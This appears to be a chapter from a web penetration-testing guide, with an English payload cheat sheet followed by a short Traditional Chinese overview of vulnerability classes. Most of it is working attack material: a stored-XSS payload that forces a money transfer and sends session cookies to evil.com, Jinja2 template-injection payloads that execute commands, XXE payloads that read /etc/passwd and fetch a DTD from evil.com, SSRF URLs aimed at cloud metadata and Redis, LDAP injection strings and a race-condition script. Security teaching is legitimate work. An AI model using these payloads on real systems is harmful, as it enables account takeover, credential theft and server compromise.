Web Exploitation
🔥 Vibe Prompt
"Chain vulnerabilities: XSS → CSRF → account takeover. SSTI to RCE."
Stored XSS to Account Takeover
// 1. Inject XSS payload
fetch('/api/profile', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
name: "<img src=x onerror=\
fetch('/api/transfer', {method: 'POST', body: JSON.stringify({to: 'attacker', amount: 1000})})
.then(r => fetch('https://evil.com/steal?cookie=' + document.cookie))
\">"
})
})
// 2. Admin visits profile → XSS fires
// 3. CSRF: auto-transfer money
// 4. Cookie theft: hijack session
// Result: Full account takeover!
SSTI (Server-Side Template Injection)
# Vulnerable: user input rendered in template
from flask import render_template_string
@app.route('/greet')
def greet():
name = request.args.get('name', 'world')
# VULNERABLE! Don't do this!
return render_template_string(f"<h1>Hello {{name}}!</h1>" % {"name": name})
# Test payload: {{7*7}}
# Response: Hello 49! → SSTI confirmed!
# RCE payload:
# {{config.__class__.__init__.__globals__['os'].popen('id').read()}}
# {{''.__class__.__mro__[1].__subclasses__()[X]('cat /etc/passwd',shell=True,stdout=-1).communicate()}}
# Jinja2 specific:
# {{cycler.__init__.__globals__.os.popen('ls').read()}}
# {{joiner.__init__.__globals__.os.popen('env').read()}}
LDAP Injection
# Vulnerable search
search_filter = f"(uid={user_input})"
# Payload: admin)(uid=*))(|(uid=*
# Result: (uid=admin)(uid=*))(|(uid=*) → returns all users!
# Blind LDAP injection
# &(uid=admin)(userPassword=*) → true if user exists
# &(uid=admin)(userPassword=A*) → true if password starts with A
XXE (XML External Entity)
<!-- Vulnerable XML parser -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<!-- SSRF via XXE -->
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<!-- Blind XXE (out-of-band) -->
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://evil.com/xxe.dtd">
%dtd;
]>
SSRF (Server-Side Request Forgery)
# Vulnerable: user controls URL
@app.route('/fetch')
def fetch_url():
url = request.args.get('url')
return requests.get(url).text # VULNERABLE!
# Attack: access internal services
/fetch?url=http://169.254.169.254/latest/meta-data/ # AWS metadata
/fetch?url=http://localhost:9200/ # Elasticsearch
/fetch?url=file:///etc/passwd # File read
/fetch?url=gopher://localhost:6379/_SET%20key%20value # Redis RCE
Race Condition
import threading, requests
def use_coupon():
requests.post("https://target.com/api/coupon/redeem",
json={"code": "FREEMONEY"},
cookies={"session": "valid_session"})
# Race: use same coupon 50x simultaneously
threads = [threading.Thread(target=use_coupon) for _ in range(50)]
for t in threads: t.start()
for t in threads: t.join()
# If 50 succeed → race condition!
# Mitigation: DB-level locking / atomic operations
Common Exploit Chains
| Chain | Impact | |-------|--------| | XSS + CSRF | Account takeover | | SSRF + Cloud metadata | Cloud credential theft | | XXE + file read | Source code disclosure | | SSTI + OS command | RCE | | SQLi + file write | Webshell | | LFI + log poisoning | RCE | | Race + balance check | Infinite money |
Best Practices for Testers
- Always chain vulnerabilities (higher impact)
- Document every step (screenshots, requests)
- Use Collaborator / Burp Suite for OOB testing
- Test in all browsers (XSS differs)
- Check WAF bypass techniques
- Verify findings with manual review
Web 漏洞的三大分類
Web 漏洞雖然有上百種,但 80% 的攻擊集中在少數幾個類型。OWASP Top 10 是必讀的參考標準。
Injection 類(注入攻擊)
| 類型 | 風險 | 防護方式 | |:----|:----|:--------| | SQL Injection | 直接讀取/刪除資料庫 | 參數化查詢(Prepared Statement) | | NoSQL Injection | 繞過 MongoDB 驗證 | 輸入驗證 + 適當的查詢過濾 | | Command Injection | 在伺服器執行系統命令 | 避免直接拼接系統命令 | | LDAP Injection | 繞過 LDAP 驗證 | 輸入跳脫處理 |
XSS(跨站腳本)
XSS 允許攻擊者在別人的瀏覽器執行 JavaScript。這是最常見的 Web 漏洞之一:
| XSS 類型 | 儲存位置 | 影響範圍 | |:--------|:--------|:--------| | 反射型(Reflected) | URL 參數 | 需要誘導使用者點擊連結 | | 儲存型(Stored) | 資料庫 | 每次載入頁面都會觸發 | | DOM Based | 前端 JavaScript | 繞過後端過濾 |
下一章預告:行動裝置與 API 滲透
Web 漏洞只是滲透測試的一部分。下一章將擴展到行動裝置 App 和 RESTful/GraphQL API 的安全測試——這些是現代 SaaS 產品的主要攻擊面。